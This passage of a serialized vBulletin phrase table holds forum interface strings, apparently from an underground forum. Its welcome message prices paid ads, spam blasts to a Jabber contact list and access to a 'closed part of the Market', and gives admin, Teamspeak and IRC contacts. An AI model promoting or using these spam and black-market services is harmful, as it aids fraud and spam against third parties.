Search\";s:3:\"age\";s:3:\"Age\";s:15:\"alert_board_off\";s:50:\"Alert: The forums are currently turned off!\";s:10:\"all_forums\";s:10:\"All Forums\";s:33:\"all_times_are_gmt_x_time_now_is_y\";s:70:\"All times are GMT%1$s. The time now is %2$s.\";s:12:\"allow_bbcode\";s:13:\"Allow BB Code\";s:10:\"allow_html\";s:10:\"Allow HTML\";s:14:\"allow_img_code\";s:16:\"Allow [IMG] Code\";s:13:\"allow_smilies\";s:13:\"Allow Smilies\";s:12:\"announcement\";s:12:\"Announcement\";s:13:\"announcements\";s:13:\"Announcements\";s:22:\"announcements_in_forum\";s:22:\"Announcements in Forum\";s:5:\"april\";s:5:\"April\";s:7:\"archive\";s:7:\"Archive\";s:10:\"attachment\";s:10:\"Attachment\";s:21:\"attachment_statistics\";s:21:\"Attachment Statistics\";s:11:\"attachments\";s:11:\"Attachments\";s:6:\"august\";s:6:\"August\";s:12:\"bb_code_is_x\";s:67:\"BB code is %2$s\";s:14:\"bbcode_allowed\";s:42:\"BB Code Allowed\";s:18:\"bbcode_not_allowed\";s:22:\"BB Code is not allowed\";s:10:\"befriend_x\";s:13:\"Befriend %1$s\";s:4:\"by_x\";s:41:\"by %2$s\";s:5:\"bytes\";s:5:\"Bytes\";s:8:\"calendar\";s:8:\"Calendar\";s:28:\"can_moderate_user_signatures\";s:28:\"Can Moderate User Signatures\";s:6:\"cancel\";s:6:\"Cancel\";s:14:\"cancel_changes\";s:14:\"Cancel Changes\";s:19:\"cant_identify_image\";s:52:\"Can\'t identify the image? Click it to get a new one.\";s:15:\"caps_lock_is_on\";s:191:\"Caps Lock is on!
\r\n
\r\nHaving Caps Lock on may cause you to enter your password incorrectly. You should press Caps Lock to turn it off before entering your password.\";s:17:\"check_uncheck_all\";s:19:\"Check / Uncheck All\";s:26:\"check_vulnerable_passwords\";s:26:\"Check Vulnerable Passwords\";s:45:\"click_a_smilie_to_insert_it_into_your_message\";s:46:\"Click a smilie to insert it into your message.\";s:20:\"click_here_to_log_in\";s:20:\"Click here to log in\";s:34:\"click_if_browser_does_not_redirect\";s:63:\"Click here if your browser does not automatically redirect you.\";s:26:\"click_the_following_button\";s:38:\"Click the following button to proceed.\";s:17:\"close_this_window\";s:17:\"Close this window\";s:13:\"closed_thread\";s:13:\"Closed Thread\";s:4:\"code\";s:4:\"Code\";s:9:\"community\";s:9:\"Community\";s:15:\"community_links\";s:15:\"Community Links\";s:7:\"contact\";s:7:\"Contact\";s:10:\"contact_us\";s:10:\"Contact Us\";s:8:\"contacts\";s:8:\"Contacts\";s:20:\"contacts_and_friends\";s:22:\"Contacts & Friends\";s:18:\"contains_new_posts\";s:18:\"Contains New Posts\";s:21:\"contains_no_new_posts\";s:21:\"Contains No New Posts\";s:26:\"current_attachment_total_x\";s:30:\"Current Attachment Total: %1$s\";s:19:\"current_attachments\";s:19:\"Current Attachments\";s:22:\"currently_active_users\";s:22:\"Currently Active Users\";s:13:\"custom_fields\";s:13:\"Custom Fields\";s:5:\"daily\";s:5:\"Daily\";s:24:\"daily_email_notification\";s:24:\"Daily email notification\";s:22:\"daily_updates_by_email\";s:22:\"Daily updates by email\";s:4:\"date\";s:4:\"Date\";s:3:\"day\";s:3:\"Day\";s:4:\"days\";s:4:\"Days\";s:8:\"december\";s:8:\"December\";s:13:\"decrease_size\";s:13:\"Decrease Size\";s:7:\"default\";s:7:\"Default\";s:6:\"delete\";s:6:\"Delete\";s:12:\"delete_posts\";s:12:\"Delete Posts\";s:15:\"delete_selected\";s:15:\"Delete Selected\";s:19:\"delete_subscription\";s:19:\"Delete Subscription\";s:13:\"delete_thread\";s:13:\"Delete Thread\";s:16:\"delete_user_note\";s:16:\"Delete User Note\";s:4:\"deny\";s:4:\"Deny\";s:17:\"destination_forum\";s:17:\"Destination Forum\";s:8:\"disabled\";s:8:\"Disabled\";s:31:\"discussion_by_x_for_y_undeleted\";s:39:\"Discussion by %1$s for \'%2$s\' Undeleted\";s:29:\"discussion_thread_created_x_y\";s:66:\"A discussion thread has been created at %1$s/showthread.php?t=%2$s\";s:7:\"dismiss\";s:7:\"Dismiss\";s:15:\"display_options\";s:15:\"Display Options\";s:17:\"do_authorizations\";s:17:\"Do Authorizations\";s:4:\"done\";s:4:\"Done\";s:26:\"doubleclick_forum_markread\";s:66:\"Double-click this icon to mark this forum and its contents as read\";s:4:\"edit\";s:4:\"Edit\";s:11:\"edit_avatar\";s:11:\"Edit Avatar\";s:12:\"edit_folders\";s:12:\"Edit Folders\";s:12:\"edit_options\";s:12:\"Edit Options\";s:16:\"edit_permissions\";s:16:\"Edit Permissions\";s:9:\"edit_poll\";s:9:\"Edit Poll\";s:9:\"edit_post\";s:9:\"Edit Post\";s:20:\"edit_profile_picture\";s:20:\"Edit Profile Picture\";s:14:\"edit_signature\";s:14:\"Edit Signature\";s:11:\"edit_thread\";s:11:\"Edit Thread\";s:14:\"edit_user_note\";s:14:\"Edit User Note\";s:17:\"edit_your_details\";s:17:\"Edit Your Details\";s:5:\"email\";s:5:\"Email\";s:13:\"email_address\";s:13:\"Email Address\";s:8:\"emailing\";s:8:\"Emailing\";s:8:\"end_date\";s:8:\"End Date\";s:26:\"enter_password_for_account\";s:86:\"Please enter a password for your user account. Note that passwords are case-sensitive.\";s:35:\"enter_username_to_login_or_register\";s:129:\"Enter your username and password in the boxes provided to login, or click the \'register\' button to create a profile for yourself.\";s:6:\"errors\";s:6:\"Errors\";s:29:\"errors_occured_when_submitted\";s:50:\"The following errors occurred with your submission\";s:5:\"event\";s:5:\"Event\";s:15:\"event_reminders\";s:15:\"Event Reminders\";s:6:\"export\";s:6:\"Export\";s:3:\"faq\";s:3:\"FAQ\";s:8:\"february\";s:8:\"February\";s:19:\"find_all_posts_by_x\";s:22:\"Find all posts by %1$s\";s:18:\"find_posts_by_user\";s:18:\"Find Posts by User\";s:5:\"first\";s:5:\"First\";s:10:\"first_page\";s:10:\"First Page\";s:19:\"first_picture_short\";s:5:\"First\";s:19:\"first_visit_message\";s:515:\"The procedure for placing ads:
\r\n
\r\n  * One-time ad placement: $ 10
\r\n\r\n  * One-time ad placement + retweet: $ 30
\r\n\r\n  * One-time ad placement + retweet + spamming jabber contact list (over 1000 customers): $ 50
\r\n
\r\n  *Seller account: advertising + retweet spamming jabber contact list fo + Access to the closed part of the Market: $ 200/month
\r\n
\r\n  * Account with access to the closed part of the Market: $ 100

\r\n\r\n admin@w0rm.ws\";s:6:\"folder\";s:6:\"Folder\";s:15:\"folder_controls\";s:15:\"Folder Controls\";s:25:\"folder_is_currently_empty\";s:31:\"This folder is currently empty.\";s:11:\"folder_name\";s:11:\"Folder Name\";s:7:\"folders\";s:7:\"Folders\";s:32:\"forgotten_password_request_email\";s:238:\"If you have forgotten your username or password, you can request to have your username emailed to you and to reset your password. When you fill in your registered email address, you will be sent instructions on how to reset your password.\";s:23:\"forgotten_your_password\";s:24:\"Forgotten Your Password?\";s:5:\"forum\";s:5:\"Forum\";s:24:\"forum_contains_new_posts\";s:24:\"Forum Contains New Posts\";s:27:\"forum_contains_no_new_posts\";s:27:\"Forum Contains No New Posts\";s:27:\"forum_is_closed_for_posting\";s:27:\"Forum is Closed for Posting\";s:10:\"forum_jump\";s:10:\"Forum Jump\";s:16:\"forum_rules_link\";s:46:\"Forum Rules\";s:6:\"forums\";s:6:\"Forums\";s:11:\"forums_home\";s:11:\"Forums Home\";s:6:\"friday\";s:6:\"Friday\";s:6:\"friend\";s:6:\"Friend\";s:9:\"gigabytes\";s:2:\"GB\";s:19:\"global_announcement\";s:19:\"Global Announcement\";s:2:\"go\";s:2:\"Go\";s:7:\"go_back\";s:7:\"Go Back\";s:27:\"go_first_unread_in_thread_x\";s:40:\"Go to first unread post in thread \'%1$s\'\";s:20:\"go_to_first_new_post\";s:20:\"Go to first new post\";s:15:\"go_to_last_post\";s:15:\"Go to last post\";s:10:\"go_to_page\";s:13:\"Go to Page...\";s:4:\"go_x\";s:9:\"Go (%1$s)\";s:32:\"group_messages_awaiting_approval\";s:25:\"Unapproved Group Messages\";s:5:\"guest\";s:5:\"Guest\";s:21:\"have_new_pm_popup_x_y\";s:117:\"You have a new private message.\\n\\nSender: %1$s\\nTitle: \'%2$s\'\\n\\nClick OK to view it, or cancel to hide this prompt.\";s:29:\"have_x_posts_in_thread_last_y\";s:47:\"You have %1$s post(s) in this thread, last %2$s\";s:15:\"hide_thumbnails\";s:15:\"Hide Thumbnails\";s:5:\"hours\";s:5:\"Hours\";s:9:\"html_code\";s:9:\"HTML Code\";s:14:\"html_code_is_x\";s:34:\"HTML code is %1$s\";s:6:\"hybrid\";s:6:\"Hybrid\";s:6:\"ignore\";s:6:\"Ignore\";s:18:\"image_verification\";s:18:\"Image Verification\";s:13:\"img_code_is_x\";s:70:\"[IMG] code is %2$s\";s:11:\"in_progress\";s:11:\"In Progress\";s:5:\"inbox\";s:5:\"Inbox\";s:24:\"incoming_friend_requests\";s:24:\"Incoming Friend Requests\";s:13:\"increase_size\";s:13:\"Increase Size\";s:4:\"info\";s:4:\"Info\";s:11:\"infractions\";s:11:\"Infractions\";s:26:\"instant_email_notification\";s:26:\"Instant email notification\";s:17:\"instant_messaging\";s:17:\"Instant Messaging\";s:29:\"instant_notification_by_email\";s:29:\"Instant notification by email\";s:10:\"invisible1\";s:12:\"is Invisible\";s:33:\"invitations_to_join_social_groups\";s:24:\"Social Group Invitations\";s:10:\"ip_address\";s:10:\"IP Address\";s:7:\"january\";s:7:\"January\";s:9:\"join_date\";s:9:\"Join Date\";s:12:\"join_request\";s:12:\"Join Request\";s:13:\"join_requests\";s:13:\"Join Requests\";s:4:\"july\";s:4:\"July\";s:14:\"jump_to_folder\";s:14:\"Jump to Folder\";s:4:\"june\";s:4:\"June\";s:9:\"kilobytes\";s:2:\"KB\";s:4:\"last\";s:4:\"Last\";s:13:\"last_activity\";s:13:\"Last Activity\";s:11:\"last_online\";s:11:\"Last Online\";s:9:\"last_page\";s:9:\"Last Page\";s:18:\"last_picture_short\";s:4:\"Last\";s:9:\"last_post\";s:9:\"Last Post\";s:19:\"last_visited_x_at_y\";s:56:\"You last visited: %1$s at %2$s\";s:14:\"lightbox_first\";s:5:\"First\";s:13:\"lightbox_last\";s:4:\"Last\";s:13:\"lightbox_next\";s:4:\"Next\";s:17:\"lightbox_previous\";s:8:\"Previous\";s:13:\"list_messages\";s:13:\"List Messages\";s:18:\"list_subscriptions\";s:18:\"List Subscriptions\";s:13:\"location_perm\";s:8:\"Location\";s:6:\"log_in\";s:6:\"Log in\";s:7:\"log_out\";s:7:\"Log Out\";s:9:\"log_out_x\";s:12:\"Log Out %1$s\";s:14:\"logged_in_as_x\";s:52:\"Logged in as %2$s\";s:27:\"lost_password_recovery_form\";s:27:\"Lost Password Recovery Form\";s:6:\"manage\";s:6:\"Manage\";s:18:\"manage_attachments\";s:18:\"Manage Attachments\";s:5:\"march\";s:5:\"March\";s:16:\"mark_forums_read\";s:16:\"Mark Forums Read\";s:25:\"mark_this_discussion_read\";s:25:\"Mark This Discussion Read\";s:20:\"mark_this_group_read\";s:20:\"Mark This Group Read\";s:26:\"maximum_allowed_messages_x\";s:37:\"Maximum allowed stored messages: %1$s\";s:28:\"maximum_attachment_storage_x\";s:32:\"Maximum Attachment Storage: %1$s\";s:3:\"may\";s:3:\"May\";s:27:\"may_choose_icon_for_message\";s:63:\"You may choose an icon for your message from the following list\";s:34:\"may_not_have_sufficient_privileges\";s:167:\"You may not have sufficient privileges to access this page. Are you trying to edit someone else\'s post, access administrative features or some other privileged system?\";s:9:\"megabytes\";s:2:\"MB\";s:7:\"members\";s:7:\"Members\";s:12:\"members_list\";s:12:\"Members List\";s:22:\"members_picture_albums\";s:23:\"Member\'s Picture Albums\";s:7:\"message\";s:7:\"Message\";s:20:\"message_deleted_by_x\";s:57:\"This message has been deleted by %2$s.\";s:31:\"message_hidden_x_on_ignore_list\";s:111:\"This message is hidden because %1$s is on your ignore list.\";s:8:\"messages\";s:8:\"Messages\";s:13:\"miscellaneous\";s:13:\"Miscellaneous\";s:21:\"miscellaneous_options\";s:21:\"Miscellaneous Options\";s:3:\"mod\";s:3:\"Mod\";s:9:\"moderator\";s:9:\"Moderator\";s:23:\"moderator_control_panel\";s:23:\"Moderator Control Panel\";s:10:\"moderators\";s:10:\"Moderators\";s:6:\"monday\";s:6:\"Monday\";s:5:\"month\";s:5:\"Month\";s:7:\"monthly\";s:7:\"Monthly\";s:6:\"months\";s:6:\"Months\";s:30:\"more_than_x_replies_or_y_views\";s:36:\"More than %1$s replies or %2$s views\";s:35:\"most_users_ever_online_was_x_y_at_z\";s:46:\"Most users ever online was %1$s, %2$s at %3$s.\";s:25:\"move_delete_subscriptions\";s:27:\"Move / Delete Subscriptions\";s:10:\"move_items\";s:10:\"Move Items\";s:23:\"move_subscribed_threads\";s:23:\"Move Subscribed Threads\";s:14:\"move_to_folder\";s:14:\"Move to folder\";s:19:\"move_x_items_from_y\";s:27:\"Move %1$s items from \'%2$s\'\";s:19:\"moved_thread_prefix\";s:7:\"Moved: \";s:16:\"multipage_thread\";s:17:\"Multi-page thread\";s:20:\"multiple_choice_poll\";s:21:\"Multiple Choice Poll.\";s:3:\"n_a\";s:3:\"N/A\";s:18:\"nav_members_search\";s:23:\"Advanced Members Search\";s:13:\"nav_new_posts\";s:14:\"Find New Posts\";s:18:\"nav_search_options\";s:20:\"Other Search Options\";s:16:\"nav_todays_posts\";s:18:\"Find Today\'s Posts\";s:10:\"networking\";s:10:\"Networking\";s:5:\"never\";s:5:\"Never\";s:3:\"new\";s:3:\"Neu\";s:9:\"new_posts\";s:9:\"New posts\";s:13:\"new_posts_nav\";s:9:\"New Posts\";s:13:\"new_user_note\";s:13:\"New User Note\";s:4:\"next\";s:4:\"Next\";s:9:\"next_page\";s:9:\"Next Page\";s:18:\"next_picture_short\";s:4:\"Next\";s:2:\"no\";s:2:\"No\";s:21:\"no_email_notification\";s:21:\"No email notification\";s:7:\"no_icon\";s:7:\"No icon\";s:12:\"no_new_posts\";s:12:\"No new posts\";s:33:\"no_signatures_awaiting_moderation\";s:33:\"No Signatures Awaiting Moderation\";s:17:\"no_users_selected\";s:18:\"No users selected!\";s:4:\"none\";s:4:\"None\";s:3:\"not\";s:3:\"not\";s:26:\"not_logged_in_fill_in_form\";s:81:\"You are not logged in. Fill in the form at the bottom of this page and try again.\";s:24:\"not_logged_no_permission\";s:117:\"You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:\";s:14:\"notice_14_html\";s:472:\"\r\n\r\n
\r\nTeamspeak³
\r\nServer: 50.7.241.58
\r\nPort: 9987
\r\n
\r\nIRC
\r\nServer: irc.darkisland.biz:6666
\r\nChannel: #uc
\r\n
\r\n\";s:14:\"notice_15_html\";s:414:\"

Planed Downtime in 1-4 Days ~
\r\n
\r\n
\"\"
\r\nVisit our twitterprofile:\r\n \"UC
\r\n

\";s:14:\"notice_16_html\";s:600:\"
\r\n\r\nYou need at least 15 posts to get moved to Usergroup \"Member\"\r\n\r\nIf there are any problems, feel free to contact us\r\n
\";s:14:\"notice_17_html\";s:135:\"Da du in letzer Zeit inaktiv warst, bist du aus dem Level2 entfernt worden, für weitere Informationen wende dich bitte an ¥akuza112 ;-)\";s:13:\"notice_1_html\";s:399:\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
\r\n
\r\nDu willst einen Bannerplatz kaufen? Dann kontaktiere die Administration.\r\n
\r\n\r\n\r\n
\r\n
\r\n
\r\n
\";s:13:\"notice_8_html\";s:1384:\"
\r\n\r\n\r\n \r\n \r\n\r\n
\";s:7:\"notices\";s:7:\"Notices\";s:12:\"notification\";s:12:\"Notification\";s:17:\"notification_type\";s:17:\"Notification Type\";s:8:\"november\";s:8:\"November\";s:17:\"number_of_replies\";s:17:\"Number of Replies\";s:15:\"number_of_views\";s:15:\"Number of Views\";s:13:\"numeric_value\";s:4:\"%1$s\";s:24:\"numeric_value_emphasized\";s:21:\"%1$s\";s:7:\"october\";s:7:\"October\";s:3:\"off\";s:3:\"Off\";s:7:\"offline\";s:7:\"Offline\";s:8:\"offline1\";s:10:\"is Offline\";s:4:\"okay\";s:4:\"Okay\";s:3:\"old\";s:3:\"Old\";s:5:\"older\";s:5:\"Older\";s:2:\"on\";s:2:\"On\";s:6:\"online\";s:6:\"Online\";s:7:\"online1\";s:9:\"is Online\";s:19:\"only_used_to_report\";s:139:\"Note: This is ONLY to be used to report spam, advertising messages, and problematic (harassment, fighting, or rude) posts.\";s:13:\"open_contacts\";s:19:\"Open Contacts Popup\";s:26:\"open_message_in_new_window\";s:82:\"Open the message in a new window?\\n\\n(Press cancel to open in the current window.)\";s:6:\"option\";s:6:\"Option\";s:35:\"option_2_upload_image_from_computer\";s:42:\"Option 2 - Upload Image From Your Computer\";s:8:\"optional\";s:8:\"Optional\";s:7:\"options\";s:7:\"Options\";s:2:\"or\";s:2:\"or\";s:22:\"originally_posted_by_x\";s:42:\"Originally Posted by %1$s\";s:6:\"page_x\";s:9:\"Page %1$s\";s:11:\"page_x_of_y\";s:17:\"Page %1$s of %2$s\";s:13:\"pagenav_first\";s:5:\"First\";s:12:\"pagenav_last\";s:4:\"Last\";s:5:\"pages\";s:5:\"Pages\";s:18:\"paid_subscriptions\";s:18:\"Paid Subscriptions\";s:8:\"password\";s:8:\"Password\";s:8:\"per_page\";s:8:\"Per Page\";s:14:\"perform_action\";s:14:\"Perform Action\";s:8:\"php_code\";s:8:\"PHP Code\";s:34:\"picture_comments_awaiting_approval\";s:34:\"Picture Comments Awaiting Approval\";s:19:\"pictures_and_albums\";s:22:\"Pictures & Albums \";s:21:\"please_enter_the_text\";s:74:\"Please enter the six letters or digits that appear in the image opposite. \";s:17:\"please_select_one\";s:17:\"Please select one\";s:8:\"pm_users\";s:8:\"PM Users\";s:4:\"poll\";s:4:\"Poll\";s:12:\"poll_options\";s:12:\"Poll Options\";s:18:\"poll_thread_prefix\";s:6:\"Poll: \";s:4:\"post\";s:4:\"Post\";s:10:\"post_icons\";s:10:\"Post Icons\";s:18:\"post_new_user_note\";s:18:\"Post New User Note\";s:16:\"post_time_x_at_y\";s:23:\"Post Time: %1$s at %2$s\";s:14:\"post_user_note\";s:14:\"Post User Note\";s:6:\"post_x\";s:9:\"Post %1$s\";s:9:\"posted_by\";s:9:\"Posted By\";s:13:\"posting_rules\";s:13:\"Posting Rules\";s:5:\"posts\";s:5:\"Posts\";s:20:\"powered_by_vbulletin\";s:98:\"Powered by vBulletin® Version %1$s
Copyright ©2000 - %2$s, vBulletin Solutions, Inc.\";s:26:\"prefix_English_title_plain\";s:9:\"[English]\";s:25:\"prefix_English_title_rich\";s:9:\"[English]\";s:28:\"prefix_bewerbung_title_plain\";s:11:\"[Bewerbung]\";s:27:\"prefix_bewerbung_title_rich\";s:11:\"[Bewerbung]\";s:4:\"prev\";s:4:\"Prev\";s:9:\"prev_page\";s:9:\"Prev Page\";s:18:\"prev_picture_short\";s:4:\"Prev\";s:8:\"previous\";s:8:\"Previous\";s:22:\"previous_picture_short\";s:4:\"Prev\";s:17:\"privacy_statement\";s:17:\"Privacy Statement\";s:7:\"private\";s:7:\"Private\";s:15:\"private_message\";s:15:\"Private Message\";s:16:\"private_messages\";s:16:\"Private Messages\";s:20:\"private_messages_nav\";s:59:\"Private Messages: %1$s, %2$s.\";s:7:\"proceed\";s:9:\" Proceed \";s:42:\"profile_visitor_messages_awaiting_approval\";s:27:\"Unapproved Visitor Messages\";s:29:\"public_poll_users_see_choices\";s:86:\"Be advised that this is a public poll: other users can see the choice(s) you selected.\";s:22:\"quick_language_chooser\";s:22:\"Quick Language Chooser\";s:11:\"quick_links\";s:11:\"Quick Links\";s:19:\"quick_style_chooser\";s:19:\"Quick Style Chooser\";s:5:\"quote\";s:5:\"Quote\";s:15:\"random_question\";s:15:\"Random Question\";s:11:\"rate_thread\";s:11:\"Rate Thread\";s:6:\"reason\";s:6:\"Reason\";s:8:\"redirect\";s:8:\"Redirect\";s:11:\"redirecting\";s:14:\"Redirecting...\";s:13:\"refresh_image\";s:13:\"Refresh Image\";s:8:\"register\";s:8:\"Register\";s:6:\"reload\";s:6:\"Reload\";s:16:\"reload_this_page\";s:16:\"Reload this Page\";s:11:\"remember_me\";s:12:\"Remember Me?\";s:6:\"remove\";s:6:\"Remove\";s:7:\"replace\";s:7:\"Replace\";s:7:\"replies\";s:7:\"Replies\";s:17:\"replies_x_views_y\";s:26:\"Replies: %1$s, Views: %2$s\";s:5:\"reply\";s:5:\"Reply\";s:12:\"reply_prefix\";s:3:\"Re:\";s:10:\"reputation\";s:10:\"Reputation\";s:19:\"reputation_disabled\";s:23:\"has disabled reputation\";s:14:\"request_reason\";s:14:\"Request Reason\";s:29:\"request_username_password_now\";s:31:\"Request Username / Password Now\";s:26:\"requests_to_join_usergroup\";s:26:\"Requests to Join Usergroup\";s:35:\"requests_to_join_your_social_groups\";s:27:\"Social Groups Join Requests\";s:5:\"reset\";s:5:\"Reset\";s:12:\"reset_fields\";s:12:\"Reset Fields\";s:19:\"results_x_to_y_of_z\";s:28:\"Results %1$s to %2$s of %3$s\";s:18:\"reverse_sort_order\";s:18:\"Reverse Sort Order\";s:20:\"review_join_requests\";s:20:\"Review Join Requests\";s:8:\"saturday\";s:8:\"Saturday\";s:4:\"save\";s:4:\"Save\";s:12:\"save_changes\";s:12:\"Save Changes\";s:12:\"save_folders\";s:12:\"Save Folders\";s:6:\"search\";s:6:\"Search\";s:13:\"search_forums\";s:13:\"Search Forums\";s:14:\"search_results\";s:14:\"Search Results\";s:18:\"search_titles_only\";s:18:\"Search Titles Only\";s:6:\"second\";s:6:\"Second\";s:34:\"select_destination_folder_for_move\";s:71:\"Please select a destination folder for the items that you wish to move.\";s:16:\"selected_threads\";s:16:\"Selected Threads\";s:4:\"send\";s:4:\"Send\";s:25:\"send_message_via_aim_to_x\";s:30:\"Send a message via AIM to %1$s\";s:27:\"send_message_via_email_to_x\";s:32:\"Send a message via email to %1$s\";s:25:\"send_message_via_icq_to_x\";s:30:\"Send a message via ICQ to %1$s\";s:25:\"send_message_via_msn_to_x\";s:30:\"Send a message via MSN to %1$s\";s:27:\"send_message_via_skype_to_x\";s:39:\"Send a message via Skype™ to %1$s\";s:27:\"send_message_via_yahoo_to_x\";s:32:\"Send a message via Yahoo to %1$s\";s:16:\"send_new_message\";s:16:\"Send New Message\";s:38:\"send_private_message_to_selected_users\";s:40:\"Send a private message to selected users\";s:25:\"send_private_message_to_x\";s:30:\"Send a private message to %1$s\";s:11:\"send_report\";s:11:\"Send Report\";s:10:\"sent_items\";s:10:\"Sent Items\";s:9:\"september\";s:9:\"September\";s:11:\"show_groups\";s:11:\"Show Groups\";s:17:\"show_message_text\";s:17:\"Show Message Text\";s:10:\"show_posts\";s:10:\"Show Posts\";s:24:\"show_results_x_to_y_of_z\";s:33:\"Show results %1$s to %2$s of %3$s\";s:28:\"show_thread_and_close_window\";s:30:\"Show Thread & Close Window\";s:12:\"show_threads\";s:12:\"Show Threads\";s:26:\"show_threads_from_last_day\";s:26:\"Show threads from last day\";s:28:\"show_threads_from_last_month\";s:28:\"Show threads from last month\";s:27:\"show_threads_from_last_week\";s:27:\"Show threads from last week\";s:29:\"show_threads_from_last_x_days\";s:32:\"Show threads from last %1$s days\";s:31:\"show_threads_from_last_x_months\";s:34:\"Show threads from last %1$s months\";s:30:\"show_threads_from_last_x_weeks\";s:33:\"Show threads from last %1$s weeks\";s:27:\"show_threads_from_last_year\";s:27:\"Show threads from last year\";s:15:\"show_thumbnails\";s:15:\"Show Thumbnails\";s:27:\"showing_results_x_to_y_of_z\";s:36:\"Showing results %1$s to %2$s of %3$s\";s:28:\"showing_x_smilies_of_y_total\";s:37:\"Showing %1$s smilie(s) of %2$s total.\";s:20:\"showthread_list_next\";s:4:\"Next\";s:20:\"showthread_list_prev\";s:4:\"Prev\";s:9:\"signature\";s:9:\"Signature\";s:10:\"site_areas\";s:10:\"Site Areas\";s:11:\"smilie_list\";s:11:\"Smilie List\";s:7:\"smilies\";s:7:\"Smilies\";s:13:\"smilies_are_x\";s:68:\"Smilies are %2$s\";s:24:\"social_group_discussions\";s:24:\"Social Group Discussions\";s:21:\"social_group_messages\";s:21:\"Social Group Messages\";s:13:\"social_groups\";s:13:\"Social Groups\";s:10:\"start_date\";s:10:\"Start Date\";s:13:\"sticky_thread\";s:13:\"Sticky Thread\";s:20:\"sticky_thread_prefix\";s:8:\"Sticky: \";s:9:\"subforums\";s:10:\"Sub-Forums\";s:7:\"subject\";s:7:\"Subject\";s:6:\"submit\";s:6:\"Submit\";s:11:\"submit_note\";s:11:\"Submit Note\";s:23:\"subscribe_to_discussion\";s:23:\"Subscribe to Discussion\";s:18:\"subscribe_to_forum\";s:18:\"Subscribe to Forum\";s:19:\"subscribe_to_thread\";s:19:\"Subscribe to Thread\";s:18:\"subscribed_threads\";s:18:\"Subscribed Threads\";s:28:\"subscribed_threads_in_folder\";s:28:\"Subscribed Threads in Folder\";s:12:\"subscription\";s:12:\"Subscription\";s:18:\"subscription_title\";s:18:\"Subscription Title\";s:13:\"subscriptions\";s:13:\"Subscriptions\";s:29:\"sum_of_attachments_owned_by_x\";s:36:\"Sum of all attachments owned by %1$s\";s:6:\"sunday\";s:6:\"Sunday\";s:24:\"sure_you_want_to_log_out\";s:33:\"Are you sure you want to log out?\";s:3:\"tag\";s:3:\"Tag\";s:10:\"tag_search\";s:10:\"Tag Search\";s:4:\"tags\";s:4:\"Tags\";s:16:\"terms_of_service\";s:16:\"Terms of Service\";s:26:\"text_editor_control_styles\";s:26:\"Text Editor Control Styles\";s:56:\"there_are_no_outstanding_requests_to_join_this_usergroup\";s:57:\"There are no outstanding requests to join this usergroup.\";s:19:\"this_poll_is_closed\";s:19:\"This poll is closed\";s:30:\"this_poll_will_close_on_x_at_y\";s:70:\"This poll will close on %1$s at %2$s\";s:41:\"this_post_will_be_automatically_moderated\";s:41:\"This post will be automatically moderated\";s:6:\"thread\";s:6:\"Thread\";s:19:\"thread_deleted_by_x\";s:41:\"Thread deleted by %2$s\";s:31:\"thread_rating_x_votes_y_average\";s:40:\"Thread Rating: %1$s votes, %2$s average.\";s:14:\"thread_starter\";s:14:\"Thread Starter\";s:7:\"threads\";s:7:\"Threads\";s:8:\"thursday\";s:8:\"Thursday\";s:4:\"time\";s:4:\"Time\";s:8:\"timezone\";s:8:\"Timezone\";s:5:\"title\";s:5:\"Title\";s:2:\"to\";s:2:\"To\";s:19:\"to_add_a_new_folder\";s:109:\"To add a new folder, enter the name of the new folder in one of the empty boxes in the list.\";s:29:\"to_delete_user_note_check_box\";s:91:\"To delete this user note, check the box below and then click the \'Delete this Note\' button.\";s:18:\"to_rename_a_folder\";s:72:\"To rename a folder, edit the folder\'s name in the list.\";s:5:\"today\";s:5:\"Today\";s:16:\"todays_birthdays\";s:17:\"Today\'s Birthdays\";s:13:\"todays_events\";s:14:\"Today\'s Events\";s:12:\"todays_posts\";s:13:\"Today\'s Posts\";s:3:\"top\";s:3:\"Top\";s:5:\"total\";s:5:\"Total\";s:13:\"total_posts_x\";s:17:\"Total Posts: %1$s\";s:11:\"total_x_nav\";s:10:\"Total %1$s\";s:14:\"track_messages\";s:14:\"Track Messages\";s:7:\"tuesday\";s:7:\"Tuesday\";s:16:\"twitter_checkout\";s:16:\"Check this out! \";s:11:\"unread_date\";s:6:\"Unread\";s:23:\"unread_picture_comments\";s:23:\"Unread Picture Comments\";s:23:\"unread_private_messages\";s:23:\"Unread Private Messages\";s:31:\"unread_profile_visitor_messages\";s:23:\"Unread Visitor Messages\";s:12:\"unread_x_nav\";s:11:\"Unread %1$s\";s:12:\"unregistered\";s:12:\"Unregistered\";s:11:\"unsubscribe\";s:11:\"Unsubscribe\";s:27:\"unsubscribe_from_this_forum\";s:27:\"Unsubscribe from this Forum\";s:35:\"upcoming_events_for_the_next_x_days\";s:40:\"Upcoming Events for the Next %1$s Day(s)\";s:24:\"update_subscription_type\";s:24:\"Update Subscription Type\";s:20:\"updating_post_counts\";s:20:\"Updating Post Counts\";s:6:\"upload\";s:6:\"Upload\";s:13:\"upload_errors\";s:13:\"Upload Errors\";s:4:\"user\";s:4:\"User\";s:18:\"user_control_panel\";s:18:\"User Control Panel\";s:7:\"user_cp\";s:7:\"User CP\";s:9:\"user_name\";s:9:\"User Name\";s:16:\"user_notes_for_x\";s:19:\"User Notes for %1$s\";s:9:\"usergroup\";s:9:\"Usergroup\";s:10:\"usergroups\";s:10:\"Usergroups\";s:6:\"userid\";s:6:\"Userid\";s:8:\"username\";s:9:\"User Name\";s:21:\"valid_file_extensions\";s:21:\"Valid file extensions\";s:11:\"vbtag_cloud\";s:11:\"Search Tags\";s:19:\"vbulletin_copyright\";s:74:\"vBulletin® v%1$s, Copyright ©2000-%2$s, vBulletin Solutions, Inc.\";s:17:\"vbulletin_message\";s:17:\"vBulletin Message\";s:4:\"view\";s:4:\"View\";s:22:\"view_all_announcements\";s:22:\"View All Announcements\";s:27:\"view_all_subscribed_threads\";s:27:\"View all Subscribed Threads\";s:17:\"view_announcement\";s:17:\"View Announcement\";s:14:\"view_birthdays\";s:14:\"View Birthdays\";s:18:\"view_forum_leaders\";s:18:\"View Forum Leaders\";s:17:\"view_poll_results\";s:17:\"View Poll Results\";s:9:\"view_post\";s:9:\"View Post\";s:12:\"view_profile\";s:12:\"View Profile\";s:16:\"view_whos_online\";s:17:\"View Who\'s Online\";s:5:\"views\";s:5:\"Views\";s:16:\"visitor_messages\";s:16:\"Visitor Messages\";s:8:\"vote_now\";s:8:\"Vote 